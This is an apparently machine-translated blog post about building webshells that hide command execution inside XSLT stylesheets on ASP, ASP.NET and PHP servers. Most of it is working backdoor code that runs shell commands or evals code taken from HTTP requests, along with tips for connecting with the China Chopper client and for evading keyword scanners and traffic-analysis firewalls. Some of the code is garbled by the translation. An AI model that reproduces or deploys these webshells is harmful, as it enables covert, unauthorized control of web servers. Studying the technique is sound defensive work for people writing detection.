Zcgonvh 2015/04/29 10:20
It all boils down to a series, though it’s tasteless to talk about Webshells in these high-flying times. Basically, it is some new webshell, special use in special environment, special kitchen knife transfer script of webshell, etc., with some corresponding analysis. Dig a hole first. Fill the hole… it depends.
0 x01 XML and XSLT
I believe everyone is familiar with XML, which is widely used in data transmission, storage and serialization. It is an extremely powerful data format. With power comes complexity, and XML has evolved into a number of standards, including DTD, XSD, XDR, XPATH, and XSLT.
XSLT, or Extended Stylesheet Transformation Language, is similar to CSS in that it transforms an XML document into another form using specified rules. The specified rules are described by another XML file, usually with an XSL suffix. The XSL syntax is relatively complex, and you can refer to the “XSLT Reference” section of MSDN for details.
To process the target node, XSLT provides a series of built-in functions for processing XML nodes. Here’s an example of a specific transformation:
XML:
#! html <? The XML version = "1.0"? > <root>123</root>Copy the codeXSL:
#! html <? The XML version = '1.0'? > < XSL: stylesheet version = "1.0" XMLNS: XSL = "http://www.w3.org/1999/XSL/Transform" > < XSL: template match = "/ root" > <xsl:value-of select="string(.) "/> </xsl:template> </xsl:stylesheet>Copy the codeThe XSL: Template node in the XSL file describes the matching rules, and its match attribute is an XPATH that represents the matched XML node. XSL :value-of describes the transformation rules that pass the node matched in the previous step as an argument to the function specified by the select attribute, the argument. Represents the matched node. Transforming the above XML and XSL produces the following output:
#! html <? The XML version = "1.0" encoding = "utf-8 16"? > 123Copy the codeIn some cases, built-in functions do not meet all requirements. To extend the power of XSLT, most XSL converters provide script extensions. Depending on the converter, the script varies and the functionality supported varies. To some extent, the security of an object is inversely proportional to its complexity. Unintended exploitation of legitimate features is a vulnerability, while malicious exploitation can be a hidden back door. XSLT’s script-execution capability is one such possible backdoor.
0 x02 asp and XML
Asp is the most common vbScript and Jscript two languages, you can create msXML2. DOMDocument COM object to obtain an XML parser. As you can see from OleView, this object exposes a transformNode method to perform XSL transformations:
The specific call code is roughly as follows:
#! xml set xmldoc= Server.CreateObject("MSXML2.DOMDocument") xmldoc.loadxml(xml) set xsldoc= Server.CreateObject("MSXML2.DOMDocument") xsldoc.loadxml(xslt) response.write xmldoc.TransformNode(xsldoc)Copy the codeAccording to MSDN, the custom function must be inside the MSXSL :script element, and the following XSL can be obtained from the example:
#! html <? The XML version = '1.0'? > < XSL: stylesheet version = "1.0" XMLNS: XSL = "http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:zcg="zcgonvh"> <msxsl:script language="vbscript" implements-prefix="zcg"> <! [CDATA[function xml(x):set a=createobject("wscript.shell"):set exec=a.Exec(x):xml=exec.stdout.readall&exec.stderr.readall:end function]]> </msxsl:script> <xsl:template match="/root"> <xsl:value-of select="zcg:xml(string(.) )"/> </xsl:template> </xsl:stylesheet>Copy the codeIn the second line, XMLNS: MSXSL is the namespace of the custom function block, and XMLNS: ZCG is the namespace and prefix of the custom function, which can be named arbitrarily.
The third line, MSXSL :script, declares a script block whose language property specifies the script language to be used, and implements-prefix corresponds to the XMLNS: ZCG namespace prefix above.
In line 7, pass ZCG: XML (string(.) Since custom functions can only pass in scalars such as strings, numbers, dates, and a series of objects in XML, we get text by converting it to a string from the built-in string function. Similarly, as Response, Server and other objects are built-in in ASP, they can neither be accessed in custom functions nor passed to custom functions. All data transfer is carried out through strings.
The function of the script block is simple execution-return, whose return value replaces the content of the matched node, so what the XSL above does is execute the text of the specified /root node in XML as a command and return the result.
The following XML is transformed and returns the following result:
#! html <? The XML version = "1.0"? > <root>cmd /c dir</root>Copy the code
You can see that the command was successfully executed and that the special characters in the result are converted into XML entities that require further processing.
Finally, in a previous IE vulnerability, the DVE used by foreigners uses the above method to call components to execute commands, so the kill effect is no longer guaranteed.
0 x03. Net and XML
XML can be called. One of the core of.net, [] System. XML System. XML, Xsl, XslCompiledTransform class and [] System. XML System. XML, Xsl, XslTransform class provides the function of the Xsl transformation.
XslTransform is a deprecated class that calls as follows:
#! html XmlDocument xmldoc=new XmlDocument(); xmldoc.LoadXml(xml); XmlDocument xsldoc=new XmlDocument(); xsldoc.LoadXml(xslt); XslTransform xt = new XslTransform(); xt.Load(xsldoc); xt.Transform(xmldoc, null);Copy the codeSince this class does not introduce additional assemblies, it is of little use.
XslCompiledTransform is the recommended Microsoft class and is called in much the same way as XslTransform:
#! html XmlDocument xmldoc=new XmlDocument(); xmldoc.LoadXml(xml); XmlDocument xsldoc=new XmlDocument(); xsldoc.LoadXml(xslt); XslCompiledTransform xct=new XslCompiledTransform(); xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver()); xct.Transform(xmldoc,null,new MemoryStream());Copy the codeBecause [asp.net provides static variables System. Web] System. Web. HttpContext: : Current is used to represent the Current HTTP request context, so don’t need for a string in asp. Construct the following XSL to try:
#! html <? The XML version = '1.0'? > < XSL: stylesheet version = "1.0" XMLNS: XSL = "http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:zcg="zcgonvh"> <msxsl:script language="JScript" implements-prefix="zcg"> function xml() {eval(System.Web.HttpContext.Current.Request.Item['a'],'unsafe'); } </msxsl:script> <xsl:template match="/root"> <xsl:value-of select="zcg:xml()"/> </xsl:template> </xsl:stylesheet>Copy the codeIf you visit, you will get an error message:
#! Failed to find a type HTML "System. Web. HttpContext. Current. Request. The Item", lack of assembly references?Copy the codeAn assembly reference is obviously missing, so look up MSDN and get the following:
#! HTML by default refer to the following two assemblies: System. DLL System. Xml. DLL. Microsoft visual basic. DLL (if the script language for VB) can use MSXSL: assembly element import other assemblies.Copy the codeAdd the necessary assemblies for WebShell to get:
#! html <? The XML version = '1.0'? > < XSL: stylesheet version = "1.0" XMLNS: XSL = "http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:zcg="zcgonvh"> <msxsl:script language="JScript" Implements -prefix=" ZCG "> < MSXSL :assembly name="mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken= b77a5C561934e089 "/> < MSXSL: Assembly name="System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken= b77a5C561934e089 "/> < MSXSL: Assembly name="System.Configuration, Version=2.0.0.0, Culture=neutral, /> < MSXSL: Assembly name=" system. Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/> function xml() {eval(System.Web.HttpContext.Current.Request.Item['a'],'unsafe'); } </msxsl:script> <xsl:template match="/root"> <xsl:value-of select="zcg:xml()"/> </xsl:template> </xsl:stylesheet>Copy the codeThere is no error with direct access, but there is an error with kitchen knife connection:
#! HTML undeclared variable "Response"Copy the codeObviously, Response is called directly in the statement submitted by the kitchen knife. Since the context of Eval in JScript.net shares variables with the caller and has the same name, manually adding the Request, Response, and Server required by the kitchen knife yields the following XSLT:
#! html <? The XML version = '1.0'? > < XSL: stylesheet version = "1.0" XMLNS: XSL = "http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:zcg="zcgonvh"> <msxsl:script language="JScript" Implements -prefix=" ZCG "> < MSXSL :assembly name="mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken= b77a5C561934e089 "/> < MSXSL: Assembly name="System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken= b77a5C561934e089 "/> < MSXSL: Assembly name="System.Configuration, Version=2.0.0.0, Culture=neutral, /> < MSXSL: Assembly name=" system. Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/> function xml() {var c=System.Web.HttpContext.Current; var Request=c.Request; var Response=c.Response; var Server=c.Server; eval(Request.Item['a'],'unsafe'); Response.End(); } </msxsl:script> <xsl:template match="/root"> <xsl:value-of select="zcg:xml()"/> </xsl:template> </xsl:stylesheet>Copy the codeThis can be done directly with a kitchen knife, which does exactly the same as ASPX (Eval) :
One final note: XML embedded script blocks require a FullTrust trust level and cannot run in safe mode. Of course, normal ASPX doesn’t run in a word in secure mode, so it’s not really a disadvantage.
0 x04 PHP and XML
A search for XSL in the official PHP documentation will direct you to the XSLTProcessor class, where you can see the registerPHPFunctions methods clearly on the page. An example of the method is a complete call procedure, changing the function to assert and making it a little more concise yields the following XSL:
#! html <? The XML version = "1.0" encoding = "utf-8"? > < XSL: stylesheet version = "1.0" XMLNS: XSL = "http://www.w3.org/1999/XSL/Transform" XMLNS: ZCG = "http://php.net/xsl" > <xsl:template match="/root"> <xsl:value-of select="zcg:function('assert',string(.) )"/> </xsl:template> </xsl:stylesheet>Copy the codeThe second line http://php.net/xsl this namespace URI represents PHP-specific XSL function support, and the fourth line ZCG :function(‘assert’,string(.)) ) means to pass the text of the matching node as an argument to PHP’s assert function.
To avoid XML escape problems, do an ASSERT nesting to get XML:
#! html <root>assert($_POST[a]); </root>Copy the codeSince PHP has no concept of context, all code is executed in the same code space, and GPCS are directly accessible in XSL, so you can connect directly using a kitchen knife:
Again, full range of features.
The only catch is that this feature is not installed by default. On Windows, you need to modify php.ini to enable php_xsl.dll extensions. On Linux, you need to specify –with-xsl at compile-time or install the PHP5-XSL package as an extra. Given the flexibility of PHP, there is little need for this type of shell to be more subtle.
0x05 Summary and others
In the XSLT transform-based Webshell described above, all sensitive calls exist in XML as strings, avoiding keyword-based Webshell kills. At the same time, because XSLT is a normal function, it is not practical to check and disable the methods provided by the XSL converter. For example, MSXML components are used by many systems for remote file downloads or XMLRPC and are virtually impossible to disable. Finally, the server-side interaction with the client is essentially through XML, so it can be disguised as a protocol such as XMLRPC/SOAP, using XML to escape sensitive characters into solid characters to evade traffic analysis-based firewalls. For example, replace CMD with the equivalent entity character CMD.
In addition to Webshell, there are other possible utilization points for XSL transformations. XML supports automatic import of XSL with the syntax:
#! html <? xml-stylesheet type="text/xsl" href="http://host/template.xsl"? >Copy the codeNo parsers other than browsers have been found to automatically parse this preprocessing command, but as a test, it is likely to be a code execution bug if it succeeds. Some server programs allow clients to submit an XSL for customization, where submitting a malicious XSL containing embedded scripts may also serve the purpose of code execution.
0x06 Reference Documents
Bypassing Windows 8.1 Mitigations using unexplored COM Objects: http://www.contextis.com/resources/blog/windows-mitigaton-bypass/
PHP xsl:http://php.net/manual/zh/book.xsl.php
The XML standard reference: https://msdn.microsoft.com/zh-cn/library/ms256177.aspx
MSXSL: script element: https://msdn.microsoft.com/zh-cn/library/ms256042.aspx
The XSLT reference: https://msdn.microsoft.com/zh-cn/library/ms256069.aspx
The XSLT transformation: https://msdn.microsoft.com/zh-cn/library/14689742.aspx
Download attachment: Download
Baidu network location: http://pan.baidu.com/s/1bnq9I8J
Decompress password see notes.